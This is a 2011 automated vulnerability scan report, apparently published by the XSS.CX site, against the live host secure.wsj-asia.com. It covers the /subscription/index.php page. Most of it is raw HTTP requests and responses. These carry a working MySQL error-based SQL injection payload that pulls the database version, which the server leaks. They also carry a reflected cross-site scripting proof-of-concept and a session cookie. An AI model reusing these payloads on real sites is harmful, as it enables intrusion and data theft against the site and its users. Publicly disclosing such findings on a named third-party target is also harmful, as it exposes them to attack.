XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, secure.wsj-asia.com

Report generated by XSS.CX at Thu Oct 06 14:51:12 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

2. Cross-site scripting (reflected)

3. SQL statement in request parameter

4. SSL certificate

5. Content type incorrectly stated


1. SQL injection  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Issue detail

The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:32:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 478
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''
           GROUP BY source' at line 3<br>SQL : SELECT pac
...[SNIP]...

Request 2

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B''' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:32:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 352
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64)
...[SNIP]...
2. Cross-site scripting (reflected)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Issue detail

The value of the source request parameter is copied into the HTML document as plain text between tags. The payload 24c14<script>alert(1)</script>99041cd2efb was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'24c14<script>alert(1)</script>99041cd2efb HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:32:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 391
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(select @@version),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'24c14<script>alert(1)</script>99041cd2efb'
           GROUP BY source</b>
3. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Request

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:31:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 350
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64)
...[SNIP]...
4. SSL certificate  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.wsj-asia.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.wsj-asia.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Sun Jul 31 19:00:00 CDT 2011
Valid to:  Sun Aug 26 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036
5. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:31:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 350
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64)
...[SNIP]...
Report generated by XSS.CX at Thu Oct 06 14:51:12 CDT 2011.